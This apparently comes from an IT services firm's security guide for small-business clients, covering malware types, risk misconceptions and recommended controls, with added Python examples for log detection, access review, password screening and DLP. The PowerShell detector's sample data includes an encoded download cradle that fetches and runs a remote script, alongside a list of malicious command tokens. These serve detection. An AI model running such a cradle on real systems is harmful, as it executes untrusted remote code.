The scale and sophistication of cybercrime, ransomware and other attacks have grown dramatically, and the protections that were adequate a few years ago no longer are. We have written this report to tell our clients what is happening and to set out the new protections we are urging you to put in place.

If your business is the victim of a cybercrime attack where your clients’ data is compromised, you will be labelled careless and irresponsible by your clients. You may even be investigated and questioned about what you did to prevent this from happening – and if the answer is not adequate, you can be found liable, facing serious fines and lawsuits even if you have protections in place. Claiming ignorance is not an acceptable defence, and this giant, expensive and potentially reputation-destroying threat is solely your responsibility to handle.

Please do NOT underestimate the importance and likelihood of these threats.

We’ve been watching these trends and putting in place the latest technologies, protocols and services to protect our clients.

The biggest challenge we face in protecting clients is that many believe “That won’t happen to me” because we’re “too small” or “don’t have anything a cybercriminal would want.” Or they simply think that if it happens, the damages won’t be that significant. That may have held true 10 to 20 years ago but certainly not today.

Don’t assume you’re out of danger because you’re “small” and not a big company. That’s exactly what cybercriminals are counting on you to believe. It makes you easy prey, because small businesses typically have no protections in place, or grossly inadequate ones at most.

82,000 new malware threats are being released every single day, and half of the cyber-attacks occurring are aimed at small businesses; you just don’t hear about it because the news wants to report on big breaches or it’s kept quiet by the company for fear of attracting bad PR, lawsuits and data-breach fines, and out of sheer embarrassment. But make no mistake – small, “average” businesses are being compromised daily, and clinging to the smug ignorance of “That won’t happen to me” is an absolute surefire way to leave yourself wide open to these attacks.

In fact, the National Cyber Security Alliance reports that one in five small businesses have been victims of cybercrime in the last year – and that number includes only the ones that were reported. Most small businesses are too embarrassed or afraid to report breaches, so it’s safe to assume that the number is much, much higher.

Chapter 1: What are Cybersecurity Threats?

What is a Hack?

It used to be much simpler: if you borrowed a floppy disk from a friend and popped it into your computer, you ran the risk of catching a computer virus.

The answer to this risk was simple: Most people installed antivirus software that protected their computers for them. And that was it.

But then two big things came along that changed everything: The internet – and greed.

You see, back in the day, most computer viruses were written for fun, and for the hacker to show off their skills. They were trying to break into computers and access information for the challenge, not the financial reward.

These days, hacking is a profession. And a very lucrative one for some. The internet has made it very easy to access hacking knowledge and powerful automated tools.

There’s also organised crime involved in modern day hacking. The criminals are systematic, thorough and ruthless with their attacks.

Believe us when we tell you that all businesses are being targeted by hackers all the time. The automated tools make this easy.

Don’t ever let anyone lull you into a false sense of wellbeing about your IT security.

We see cyber-attacks on businesses virtually every day. Mostly we see evidence of failed attacks, as the businesses we look after are well prepared and protected.

But occasionally we speak to business owners or managers we don’t (yet) look after, who’ve been successfully attacked. And the consequences can be devastating, depending on what has happened to them.

Anything that has been designed to steal your data or hurt your computer systems is now called malware – for “malicious software”.

There are a number of different ways you can be targeted. Being aware is the first defensive weapon.

Types of Threats            

Here’s our guide to the nine most terrifying kinds of malware.

1. Viruses

Malware is much more than just viruses. Which is why you need a greater spread of defense than just antivirus software.

Viruses attach themselves to other files or programs and run whenever those files are opened, infecting more files as they go; some delete or corrupt data along the way, which makes clean-up very difficult. Often, viruses work by replicating themselves or by flooding networks, making it impossible for you to perform even simple tasks.

Clean-up can range from difficult to virtually impossible. In many cases, to get things working again you will need to quarantine or delete the affected files, and possibly even rebuild the computers from scratch.

2. Worms

Worms have been around since the 1980s; the Morris worm of 1988 was the first to make headlines. Some spread by email: one person opens an infected message and the worm mails itself to everyone in their address book. Others need nobody to do anything at all: they scan the network for machines with an unpatched flaw, copy themselves across and move on, which is how a single infected laptop can take down a whole network.

The scary thing about worms is that, unlike a virus, a worm doesn’t need a host file or a person to run it. Worms replicate themselves and exploit vulnerabilities in other software to do their job for them.

You may have heard of the ‘ILOVEYOU’ worm, which came out in May 2000. It affected around 50 million Windows machines across the world in just 10 days. WannaCry did the same thing in 2017 through an unpatched Windows file-sharing flaw, which is why prompt patching is the single most effective defence against worms. That’s how powerful and fast-moving worms can be.

3. Trojans

Trojans - also known as Trojan horses after the Ancient Greek story – have replaced worms as popular hacking tools. They’re the new weapon of choice.

This type of malware takes advantage of its victim’s lack of security knowledge. It disguises itself as something you would expect (an invoice, a delivery notice, a software update) and usually arrives in the form of an email attachment or link. These lures are becoming more and more authentic looking, so it’s easy to be caught out.

Once you open the attachment… bang… it’s got you.

Trojans can also be pushed onto devices when you land on an infected website.

This kind of malware is difficult to defend against, because trojans are easy to write and are triggered by people opening them in error, so technical controls have to be backed up by staff who know what to look for.

4. Hybrids

You might associate hybrids with cars that are better for the environment. There’s nothing good about a malware hybrid.

Look back at the first three kinds of malware we’ve talked about, and how difficult they are to protect against.

Now picture the love child of two of these forms of malware quietly arriving to attack your business.

Terrifying. A hybrid is just that – malware with different attributes, such as the disguise of a trojan and the power of a worm.

As you can imagine, with hybrids it can be very difficult to clean up after an attack.

5. Ransomware

This might be 5th on our list, but ransomware is the malware most feared by IT professionals.

Ransomware is absolutely enormous right now. And businesses like yours are the prime target.

It works by encrypting all your data and holding it hostage. You literally have no data at all – no customer records, no files, no emails, nothing. Can you imagine how terrifying that would be? Increasingly the criminals also copy your data out before encrypting it and threaten to publish it, so even a perfect backup does not end the extortion.

The hackers demand you pay a ransom for them to free your data and give it back to you. This can run from thousands to millions of dollars, usually demanded in cryptocurrency (such as Bitcoin), which is harder to trace.

Most ransomware is a trojan, meaning it relies on someone accidentally triggering it by opening an attachment or visiting a malicious website. The other common ways in are remote-access services exposed to the Internet and stolen or guessed passwords.

Sadly, this type of attack is very difficult to recover from - the financial impact can be huge - and that’s without paying the ransom.

Please make sure your files are backed up regularly, that at least one copy is kept offline or otherwise out of reach of an infected machine, and that you have actually tested a restore. And make sure you and your team are trained to spot the phishing emails that typically start an attack.

6. Fileless Malware

Technically this isn’t a separate category of malware but a delivery technique; it’s included here because it poses a real threat to you and your business.

Around half of all malware attacks are delivered by fileless malware, and this is growing all the time.

Where ‘traditional’ malware writes a file to disk that antivirus can scan, fileless malware runs entirely in memory, typically by abusing tools already built into Windows such as PowerShell, WMI and the registry, so there is no file to quarantine.

This type of attack is much harder to detect and stop with signature-based tools. The practical defence is to log what those built-in tools are asked to do and look for abnormal behaviour.
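Because a fileless attack leaves nothing on disk to scan, the defence is to record what the built-in tools are asked to do and look for the tell-tale shapes. The following Python script is an added example written for this guide, not code from the original page. It assumes process-creation records have been reduced to user|parent process|command line (roughly what Sysmon Event ID 1 or Windows event 4688 gives you), that PowerShell is the tool being abused, and it runs over constructed sample lines rather than real telemetry.

```python
"""Spot encoded and living-off-the-land PowerShell in process-creation logs.

Added example for this guide, not code from the original page. It assumes
each record has been reduced to  user|parent_process|command_line  (roughly
what Sysmon Event ID 1 or Windows event 4688 gives you) and that PowerShell
is the built-in tool being abused. Sample log lines are constructed.
"""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...),
# so matching only the full flag name would miss most real one-liners.
ENCODED_FLAG = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# Tokens common in malicious one-liners and rare in administrators' scripts,
# with a weight each. "-nop" also matches -NoProfile, which is the same option.
SUSPICIOUS_TOKENS = {
    "iex": 3, "invoke-expression": 3, "downloadstring": 3,
    "frombase64string": 2, "net.webclient": 2, "invoke-webrequest": 1,
    "-nop": 1, "hidden": 2, "bypass": 2,
    "add-mppreference": 3,       # tampering with Defender exclusions
    "reflection.assembly": 2,    # loading code straight into memory
}
# Office and mail clients should almost never spawn a shell.
USER_APP_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def encode_ps(command: str) -> str:
    """Encode a command the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str):
    """Return the decoded payload if the line carries -EncodedCommand, else None."""
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None   # not valid base64/UTF-16; the flag itself is still scored below


def analyse(line: str) -> dict:
    """Score one record; the caller decides what score is worth an alert."""
    user, parent, command_line = line.split("|", 2)
    decoded = decode_encoded_command(command_line)
    # Score tokens against the visible command plus the decoded payload, with the
    # base64 blob itself removed so random base64 cannot spell a token by chance.
    visible = ENCODED_FLAG.sub(" -encodedcommand <blob>", command_line)
    text = (visible + " " + (decoded or "")).lower()
    indicators, score = [], 0
    if ENCODED_FLAG.search(command_line):
        indicators.append("encoded-command")
        score += 2
    for token, weight in SUSPICIOUS_TOKENS.items():
        if token in text:
            indicators.append(token)
            score += weight
    if parent.lower() in USER_APP_PARENTS:
        indicators.append("parent:" + parent)
        score += 4
    return {"user": user, "parent": parent, "decoded": decoded,
            "indicators": indicators, "score": score}


def scan(lines, threshold: int = 5):
    """Return the records that reach the alert threshold."""
    return [a for a in map(analyse, lines) if a["score"] >= threshold]


# Constructed sample records (not real telemetry): a scheduled backup, a
# Word document launching a hidden, encoded download cradle, and a deployment.
DOWNLOAD_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_LOGS = [
    "alice|explorer.exe|powershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
    "bob|WINWORD.EXE|powershell.exe -w hidden -nop -enc " + encode_ps(DOWNLOAD_CRADLE),
    "carol|cmd.exe|powershell.exe -ExecutionPolicy Bypass -File C:\\deploy\\install.ps1",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOGS):
        print(alert["user"], alert["parent"], "score", alert["score"], alert["indicators"])
        if alert["decoded"]:
            print("  decoded:", alert["decoded"])
```

Run stand-alone it flags only the Word-launched record, prints the decoded download cradle, and lets the legitimate backup and deployment scripts through; in practice the same scoring would sit in your SIEM or EDR rules, and the parent-process signal alone is worth an alert even when the payload cannot be decoded.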

7. Adware

You’re on a website. There’s a pop-up. You click on it. And before you know it, some software is installed on your computer. Or there’s a new plugin to your browser. Or your browser no longer uses your search engine of choice.

Adware is often more annoying than dangerous. But it can slow computers down or make you more vulnerable to other attacks. And anything that’s installed without your express permission is a pest and should be tackled.

8. Malvertising

Don’t you just love a good word blend?

As you probably guessed, malvertising is malware hidden behind advertising.

Don’t confuse this with adware. Malvertising occurs when a cybercriminal pays for an advert on a genuine website. When you click on the ad, you’re either redirected to a malicious website, or malware is installed on your device.

Sometimes even genuine ads are compromised. And even more scarily, sometimes you don’t even have to click the ad to be affected. This is called a drive-by download attack.

9. Spyware

Once again, a very descriptive name. Spyware is used to spy on you.

When installed, spyware can monitor the websites you visit, everything you type (this is known as keylogging) and any other information about you and what you’re doing on your device.

It’s a good way for someone to find out your login information and passwords.

Spyware is activated when you click on something you shouldn’t, such as an attachment, a pop-up or notification. Or by downloading media from an unreliable source.

Like adware, this is simpler to remove, but by the time you’ve noticed it, there’s the risk you’ve given away a lot of valuable information.

So, there we have it. The 9 most terrifying types of malware and how they’ll affect you and your business.

The impact that many of these forms of malware can have on a business ranges from simple lost productivity down to total bankruptcy.

This guide is just a simple summary. We don’t want to terrify you with facts and figures. But it’s safe for you to assume that you don’t want to deal with the fall out of a major attack on your business.

Remember what we said right at the start of this guide: All businesses are being targeted by hackers all the time.

You need to make sure you’re doing everything you can to keep your business safe. This starts with creating a culture of taking your cyber-security very seriously.

Consult with a trusted IT support partner to find out the best blend of software, training and procedures to keep your business safe.

There’s a lot that can be done to protect your business and its data from attack. But it needs to be done before an attack happens.


Chapter 2: Why Cybersecurity is a Major Business Risk 

Ask any business owner how they build their business, and most will tell you they establish relationships with their clients. Those relationships are carefully constructed on trust. The customer entrusts the business to deliver products or services that the customer needs with as few headaches as possible. The customer entrusts the business with information—often extremely sensitive information—and expects the business to be good stewards of that information.

Abuse that trust and the business relationship, so carefully constructed, crumbles like a house of cards. Any business that maintains records containing personal information about their clients sits precariously on a house of cards. That house stands one cybersecurity breach away from utter decimation. Each record containing personal information is a liability for the business storing that information and a meal ticket for the cybercriminal, hoping to gain access to it. Although the sensitive information held varies by industry—my company works heavily with accounting firms—the inherent risks are similar in all industries. If a business operates anywhere in the digital realm, it has something to protect from a cyberattack.

There are several misconceptions around cybersecurity, which I will discuss below, but before that, let me introduce you to what I refer to as “The Security Dilemma.” I discuss this with clients, and it is becoming more relevant as businesses further embrace the cloud and the “edges” of the traditional corporate network continue to shift. At the top of the Security Dilemma triangle is secure; the second side is usable and the third is cheap. You can only have two of the three sides:

  • Usable + Cheap = is not secure
  • Usable + Secure = will not be cheap
  • Secure + Cheap = will not be usable

As the Security Dilemma triangle shows, you need to invest in security (“Usable & Cheap” is not Secure). The security landscape is one that is continuously evolving, hence the need for continual investment. The question now becomes: where do you invest to get the highest return (the best security you can afford), and how do you determine your return on this investment?

The first misconception – cybersecurity is an IT issue

There’s a misconception among business owners that cybersecurity is strictly an IT issue, and that risk can be eliminated by purchasing a piece of technology. So, what is the difference between Information Technology (IT) and Cybersecurity?

  1. Information Technology (IT) focuses on hardware, software, and networks. This includes things such as routers, firewalls, networks, anti-virus, Windows patching, and backups.

  2. Cybersecurity focuses on people, processes, and policies. This includes staff awareness (i.e., human behavior), legal risks, regulatory compliance, business continuity, incident management, and operational frameworks and policies.

Put simply, IT has a “fix-it mentality,” while cybersecurity has a “secure and monitor” mentality. Certainly, the addition of up-to-date technology aids cybersecurity protection, but information technology focusing on hardware and networks is not all there is to cybersecurity. Ninety percent of cybersecurity breaches are caused by human error, not by IT systems. Human behaviors, risks, compliance, operational framework, and policies are all factors, as well.

The second misconception – we need to protect everything

The next misconception is that we need to protect everything. Since trying to 'protect everything protects nothing,' companies need to set and follow priorities regarding what data assets to protect, what threats to defend against, and where to spend their money on cybersecurity countermeasures. When we are working with accounting firms, it is especially important to determine where their data is, who has access to the data and who can access the data from where. It is about identifying the “digital crown jewels” of the firm, which is more important than ever when operating in the “Cloud.” But protecting every bit of data equally isn’t a viable strategy, as no business has unlimited funds for security measures. You need to start by identifying what you are trying to protect.

This can include, for example:

  • Your website: Some hackers live for the pure joy of stopping a business from doing business. How long, do you think, your company can survive without the revenue from its e-commerce site or the leads from its well-written landing pages?

  • Documents on your server or in the cloud: What is there and to whom is it valuable?

  • Accounting applications: It’s fair to assume that your business wouldn’t be able to revert to ledgers and calculators in the event a cyber attack disrupted access to your accounting applications.

  • HR Applications: If it is critical to managing your employees, it is critical to your business.

Your business must maintain an up-to-date data asset registry. This is a list of every application, the data it stores, where it is, and who has access to it. Identify and establish which data assets are linked together and how they interact.

Ask questions specific to your business, such as:

  • Where can I access each file from?

  • Can I access any corporate networks from the guest Wi-Fi?

  • What are my most valuable data assets, who can access them, and from where can they be accessed?

  • If an attacker compromises the CEO’s user account, what else can they access?

  • Do all the cloud applications used in your business have and enforce multi-factor authentication?

  • What are the security statements and protocols from your cloud providers?

It is incredibly common for businesses to think they have certain access controls in place when there is a misconfiguration or no control at all. This could be a simple oversight or, worse, the control was removed on request because it was too hard for the user (remember our Security Dilemma triangle). Make sure you manually test every one of the answers to the questions above. Assuming that everything is in order can prove to be a costly mistake.
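To make the questions above concrete, here is an added Python example (not from the original page) that encodes a small, constructed data asset registry and answers two of them directly: what a compromised account can reach from a given network, and which cloud applications do not enforce MFA. The asset, group and user names are invented for illustration.

```python
"""Answer "if this account is compromised, what else can the attacker reach?"
from a data asset registry.

Added example for this guide, not from the original page. The registry,
groups and names below are constructed for illustration.
"""
from collections import deque

# Every application, the data it stores, where it lives, whether it enforces
# MFA, from which network it can be reached, and which principals have access.
ASSETS = {
    "xero":        {"data": "client ledgers",    "where": "cloud",   "mfa": True,
                    "from": "anywhere",   "access": {"finance", "ceo"}},
    "hr-portal":   {"data": "payroll and TFNs",  "where": "cloud",   "mfa": False,
                    "from": "anywhere",   "access": {"hr", "ceo"}},
    "file-server": {"data": "client tax files",  "where": "on-prem", "mfa": False,
                    "from": "office-lan", "access": {"all-staff"}},
    "website-cms": {"data": "marketing pages",   "where": "cloud",   "mfa": False,
                    "from": "anywhere",   "access": {"marketing"}},
}
# Group -> members. Members may themselves be groups (nested membership).
GROUPS = {
    "all-staff": {"finance", "hr", "marketing", "ceo"},
    "finance":   {"fiona"},
    "hr":        {"harry"},
    "marketing": {"mia"},
    "ceo":       {"carla"},
}


def groups_of(user: str) -> set:
    """All groups a user belongs to, following nested membership (breadth-first)."""
    member_of = {}
    for group, members in GROUPS.items():
        for member in members:
            member_of.setdefault(member, set()).add(group)
    seen, queue = set(), deque([user])
    while queue:
        node = queue.popleft()
        for group in member_of.get(node, ()):
            if group not in seen:
                seen.add(group)
                queue.append(group)
    return seen


def blast_radius(user: str, from_network: str = "anywhere") -> list:
    """Assets `user` can reach from `from_network`, directly or through groups,
    each with the weak controls on that path spelled out."""
    principals = groups_of(user) | {user}
    reachable = []
    for name, asset in ASSETS.items():
        if not asset["access"] & principals:
            continue
        if asset["from"] not in ("anywhere", from_network):
            continue                       # network restriction holds
        weaknesses = []
        if not asset["mfa"]:
            weaknesses.append("no MFA")
        if asset["from"] == "anywhere":
            weaknesses.append("reachable from any network")
        reachable.append((name, asset["data"], weaknesses))
    return reachable


def unprotected_cloud_apps() -> list:
    """Cloud applications that do not enforce MFA."""
    return sorted(name for name, a in ASSETS.items()
                  if a["where"] == "cloud" and not a["mfa"])


if __name__ == "__main__":
    for network in ("anywhere", "office-lan"):
        print("carla compromised, attacker on", network)
        for name, data, weak in blast_radius("carla", network):
            print("  ", name, "(" + data + ")", ", ".join(weak) or "controls intact")
    print("cloud apps without MFA:", unprotected_cloud_apps())
```

The point of keeping the registry as data rather than in someone's head is that the answer changes every time a group membership or a network rule changes; re-running the check after each change, and comparing the result with what the cloud consoles actually enforce, is the "manually test every answer" step from the text.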

The third misconception – industry standards are all you need

Another misconception I often hear from business owners is that they are compliant with an industry standard (e.g., the NIST Cybersecurity Framework), so this means they are secure. Being compliant with an industry-specific set of control standards (e.g., PCI DSS for payment card processors) is not equivalent to having a robust and effective information security posture. You need to look no further than the massive credit card data exfiltration at Target a few years ago. Target was certified as being PCI-compliant at the time their breach occurred. Cybersecurity standards are about compliance, but hackers are cunning and devious, always looking for ways to penetrate business defenses or the lack thereof. The key here is that compliance does not equal security, nor are they the same thing.

Compliance is a regulatory, one-size-fits-all, point-in-time snapshot that demonstrates you meet the minimum, security-related requirements of specific regulatory standards like PCI or NIST. Security is the whole unique system of policies, processes, and technical controls that define how your organization stores, processes, consumes and distributes data. A key difference between compliance and security is that compliance requirements change slowly and predictably. The security and threat landscape is in a perpetual state of change, which often means compliance is a few steps behind current threats. Just checking those compliance boxes won’t cover all your security needs and can leave your data and systems without adequate protection.

The fourth misconception – underestimating future risk

Everyone has their own definition of risk. Some people will go sky diving, while others will consider a day at the beach as risky. It is difficult for people to assess its true level. People tend to underestimate long-term risks and overestimate short-term risks. Have you ever wondered why people still smoke? Or why climate change is so hard for some people to accept? It is because we tend to underestimate long-term risks. We focus on the news of today, tending to be concerned with what is happening now, and see only what is directly in front of us. Take, for example, the BYOD movement in workplaces.

Employers think it a win for them to have their employees bring their own device (BYOD) to the office. After all, by allowing or encouraging the employee to provide their own laptop or cell phone, the employer avoids the expense of providing those items, and the employee may be more likely to work from home, putting in more hours for the company. Employees probably do not have the same level of security on their personal devices that a company device would have, thereby making it easier for a hacker to compromise the corporate system while the personal device is connected to the network. Saving $1000 on a laptop in the short run can lead to cybersecurity issues in the long run, resulting in downtime, loss of revenue, and potential fines.

Many businesses forgo employee cybersecurity training to avoid the expense. They rationalize it by saying, “My staff would know not to click that link.” However, that same staff member will do exactly that if they think the email is from their boss. That tendency goes back to the employee’s understanding of risk; they see the risk potential as somewhere down the road, not an immediate threat. On the flip side of the coin, employees do see a risk in questioning their bosses.

The risk of disappointing the boss is immediate, and the retribution swift. The employee who just opened a hacker’s email will defend his action by saying, “It had my boss's email address. It had my boss's name on it. I believed it was my boss instructing me to do something, and it's not my job to question it.” Complicating the issue, employers tend to trust their employees. “My employee would never do that,” they say. However, one company had to pay ransom to a hacker not once, but twice, because of the negligent actions of the same employee. This is not about personal trust (which society depends on), but about digital trust. Digital trust refers to the connections between people, data, and networks. How are you doing this in your business? So, trust your employees, but never underestimate the risks.

The fifth misconception – not planning for disaster

Companies map out the trajectory of the business in six-month, one-year, and five-year increments. They plan for all the positives but fail to plan for failures. When cybersecurity threats manifest, they have no business continuity plan in place. Once that employee opens an email containing a ransomware payload, there is no control-alt-delete to stop the process. The only way out for your business is through it. The clock is ticking.

A business continuity plan is a comprehensive guide to protecting your business from known cybersecurity threats, as well as a recovery plan for the aftermath of the unthinkable. Just like our Fourth Misconception (Underestimating Future Risk), most businesses underestimate the amount of time a recovery can take. What’s the plan if you cannot recover?

Summary

Cybersecurity, at the end of the day, is about balancing people, processes, and technology, like the house of cards. With a finite set of resources—a 52 card deck—you can choose to construct a tall house or a wider, more stable one. You may remove a card to reposition it, as long as you are aware of the weakness its removal creates in the structure. And you must have a plan for when the unexpected breeze wreaks havoc, and you are forced to rebuild.


Chapter 3: How to Manage a Cyber Attack on Your Business? 

You should know there is absolutely no way we, or anyone else, can 100% guarantee you won’t get compromised – you can only put smart protections in place to greatly reduce the chances of this happening, to protect data so it is recoverable and to demonstrate to your employees and clients that you were responsible and not careless.

What’s worse than a data breach? Trying to cover it up. Companies like Yahoo! have learned that lesson the hard way, facing multiple class-action lawsuits for not telling their users promptly when they discovered they were hacked. With Dark Web monitoring and forensics tools, breached data that turns up for sale is routinely traced back to the company and website it came from, so you cannot hide it; and in Australia the Notifiable Data Breaches scheme makes notifying affected individuals and the regulator a legal requirement anyway.

One of the things we want to discuss with you is how to ensure you are compliant and you stay compliant.

One breach, one ransomware attack, one rogue employee you are not protected against, can create HOURS of extra work for staff who are already maxed out when things are going well. Then there’s business interruption and downtime, backlogged work delivery for your current clients. Loss of sales. Forensics costs to determine what kind of hack attack occurred, what part of the network is/was affected and what data was compromised. Emergency IT restoration costs for getting you back up, if that’s even possible. In some cases, you’ll be forced to pay the ransom and maybe – just maybe – they’ll give you your data back. Then there are legal fees and the cost of legal counsel to help you respond to your clients and the media. Cash flow will be significantly disrupted, budgets blown up. Some states require companies to provide one year of credit-monitoring services to consumers affected by a data breach and more are following suit.

Bank Fraud:
If your business bank account is accessed and funds stolen, the bank is, in most cases, NOT responsible for replacing those funds. Take the true story of Verne Harnish, CEO of Gazelles, Inc., a very successful and well-known consulting firm, and author of the best-selling book The Rockefeller Habits.

Harnish had $400,000 taken from his bank account when hackers were able to access his PC and intercept e-mails between him and his assistant. The hackers, who are believed to be based in China, sent an e-mail to his assistant asking her to wire funds to 3 different locations. It didn’t seem strange to the assistant because Harnish was then involved with funding several real estate and investment ventures. The assistant responded in the affirmative, and the hackers, posing as Harnish, assured her that it was to be done. The hackers also deleted his daily bank alerts, which he didn’t notice because he was busy running the company, traveling and meeting with clients. That money was never recovered and the bank is not responsible.

Some hackers don’t lock your data for ransom or steal money. Often they use your server, website or profile to spread viruses and/or compromise other PCs. If they hack your website, they can use it to relay spam, run malware, build SEO pages or promote their religious or political ideals. (Side note: This is why you also need advanced endpoint security, spam filtering, web gateway security, SIEM and the other items detailed in this report, but more on those in a minute.)

Below is a list of things we recommend all clients have in place ASAP. Some you may already have, and some may be lacking, which is why we are currently contacting all clients to conduct a review of their current situation.

QBRs Or Quarterly Business Reviews And Security Risk Assessments: We will be more persistent in scheduling and holding these meetings with all clients. During these consultations, we will conduct a security risk assessment and provide you with a score. We will also brief you on current projects, review your IT plan and budgets, discuss NEW tools and solutions we feel you may need, and make recommendations. We will also answer any questions you have and make sure you are satisfied with our services.

Proactive Monitoring, Patching, Security Updates: This is what we deliver in our Managed IT Services Plan.

Insurance Review: At least once a year, we will provide you with a copy of our policies and protections for YOU. We can also work with your insurance agent to review your cyber liability, crime and other relevant policies to ensure we, as your IT company, and you, as a company, are fulfilling their requirements for coverage.

Data Breach And Cyber-Attack Response Plan: This is a time- and-cost-saving tool as well as a stress-reduction plan. We will be working with our clients to create and maintain a cyber-response plan so that IF a breach happens, we could minimize the damages, downtime and losses, and properly respond to avoid missteps.

Ransomware Backup And Disaster Recovery Plan: One of the reasons the WannaCry outbreak in 2017 was so devastating was that it spread on its own through an unpatched Windows flaw, deleted the local shadow copies Windows keeps for recovery, and encrypted any backup it could reach over a mapped drive or network share. A backup that an infected machine can write to is not a backup. Keep at least one copy offline or otherwise unreachable from the network, keep enough versions to go back to before the infection, and test a full restore on a schedule rather than assuming it works.

A Mobile And Remote Device Security Policy: All remote devices – from laptops to cell phones – need to be backed up, encrypted and have a remote “kill” switch that would wipe the data from a lost or stolen device. You also need to have a policy in place for what employees can and cannot do with company-owned devices, how they are to responsibly use them and what to do if the device is lost or stolen.

More Aggressive Password Protocols: Employees choosing weak passwords are STILL one of the biggest threats to organizations. To protect against this, we will put in place controls that enforce long passphrases, block passwords that appear in known breach lists or contain the company or user name, and require an immediate change whenever a credential is suspected of being compromised. We no longer recommend forcing a change every month: current guidance (NIST SP 800-63B) advises against routine periodic rotation, because it pushes people into predictable patterns such as incrementing a number, and multi-factor authentication does far more to stop a stolen password being used. We will also have checklists for employees who are fired or quit to shut down their access to critical company data and operations on the day they leave.
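As an added example for this guide (not the page’s own tooling), the Python below screens a proposed password along the lines just described: minimum length, no breached or guessable passwords, and rotation driven by evidence rather than the calendar. The breach corpus is a tiny constructed stand-in, indexed by SHA-1 prefix the same way the Have I Been Pwned range API works, so the full hash never has to leave your network; the 14-character minimum is an assumption.

```python
"""Screen a proposed password the way NIST SP 800-63B recommends: enforce
length, reject breached or guessable passwords, and do not rely on the
calendar for rotation.

Added example for this guide, not the page's own tooling. The breach corpus
is a tiny constructed stand-in, indexed by SHA-1 prefix the way the
Have I Been Pwned range API is (5-character prefix out, suffixes back), so the
full hash never has to leave your network. MIN_LENGTH is an assumption.
"""
import hashlib

MIN_LENGTH = 14          # assumption: favour long passphrases over complexity rules
PREFIX_LEN = 5           # k-anonymity: only this much of the hash is ever sent


def sha1_hex(password: str) -> str:
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


# Constructed stand-in for a breach list: prefix -> {suffix: times seen}.
_BREACHED = ["password", "Password123!", "Welcome2024!", "letmein",
             "correcthorsebatterystaple"]
BREACH_INDEX = {}
for _pw in _BREACHED:
    _h = sha1_hex(_pw)
    BREACH_INDEX.setdefault(_h[:PREFIX_LEN], {})[_h[PREFIX_LEN:]] = 1


def breach_count(password: str) -> int:
    """Look the password up by hash prefix only; compare suffixes locally."""
    h = sha1_hex(password)
    suffixes = BREACH_INDEX.get(h[:PREFIX_LEN], {})   # what the range API would return
    return suffixes.get(h[PREFIX_LEN:], 0)


def check_password(password: str, user_attributes=()) -> list:
    """Return the reasons a password is unacceptable (empty list = acceptable)."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if breach_count(password):
        problems.append("appears in a known breach")
    lowered = password.lower()
    for word in user_attributes:          # username, company name, etc.
        if len(word) >= 4 and word.lower() in lowered:
            problems.append(f"contains '{word}'")
    if len(set(lowered)) <= 3:
        problems.append("too few distinct characters")
    return problems


def rotation_required(evidence_of_compromise: bool) -> bool:
    """Force a change on evidence of compromise (breach hit, phishing report),
    not because a month has passed."""
    return evidence_of_compromise


if __name__ == "__main__":
    for candidate in ("Password123!", "correcthorsebatterystaple",
                      "rain-gutter-violin-stamp-42"):
        print(candidate, "->", check_password(candidate, ("fiona", "acme")) or "ok")
```

Note that a long, famous passphrase is rejected for being in the breach list, not for failing a complexity rule; that is the behaviour you want, since attackers try published passwords before they try brute force.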

Advanced Endpoint Security: There has been considerable talk in the IT industry that antivirus is dead, unable to prevent the sophisticated attacks we’re seeing today. Signature-based antivirus still has a place, but on its own it cannot see fileless attacks or brand-new malware. Modern endpoint detection and response (EDR) tools watch what programs actually do on the machine (a Word document launching PowerShell, a process encrypting hundreds of files in a minute), block the behaviour, and keep a record an investigator can use afterwards.

Multi-Factor Authentication: Depending on your situation, we will be recommending multi-factor authentication for access to critical data and applications.

Web-Filtering Protection: Adult content, online gaming, gambling and file-sharing sites for movies and music are among the most visited categories of site, often during the 9-to-5 workday, and they are prime hunting grounds for malvertising and fake downloads. These are sites you do NOT want your employees visiting on company-owned devices. If your employees are visiting infected websites, or websites you DON’T want them accessing at work, they can not only expose you to malware and hackers, but can also expose the business to harassment claims and, in the worst cases, criminal liability, not to mention the distraction and time wasted on YOUR payroll, with YOUR company-owned equipment. All of this can (and should) be blocked on company-owned Internet connections and devices, typically with DNS or web-proxy filtering by category.

Cyber Security Awareness Training: Employees accidentally clicking on a phishing e-mail or downloading an infected file or malicious application is still the #1 way cybercriminals hack into systems. Training your employees FREQUENTLY is one of the most important protections you can put in place. Seriously. We have several new solutions we can discuss with you to inform and remind your employees to be on high alert and reduce their likelihood of clicking on the wrong e-mail or succumbing to other scams.

Protections For Sending/Receiving Confidential Information Via E-mail: Employees have access to a wide variety of electronic information that is both confidential and important, and e-mail is the easiest way for it to leak, whether by mistake or on purpose. That’s why we’ll be ensuring all clients’ e-mail systems are configured with data loss prevention (DLP) rules that detect protected data such as card numbers and tax file numbers in outgoing mail and block or encrypt it, and with encryption in transit (TLS) enforced for mail to and from the business.
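The Python below is an added example for this guide, not the page’s own configuration, of the detection logic a DLP rule applies to outbound mail: it looks for payment card numbers that pass the Luhn check and Australian Tax File Numbers that pass the ATO check-digit test, and decides whether to block, log or allow the message. The sample messages and the internal domain example.com.au are constructed.

```python
"""Outbound-mail DLP check: find payment card numbers (Luhn-valid) and
Australian Tax File Numbers (ATO check digit) before a message leaves.

Added example for this guide, not the page's own configuration; in practice
this logic lives in the mail gateway's DLP policy. Sample messages and the
internal domain example.com.au are constructed.
"""
import re

# 13-19 digits, optionally separated by spaces or dashes, not inside a longer run.
CARD_CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){13,19}(?!\d)")
# Nine digits in the usual 3-3-3 grouping.
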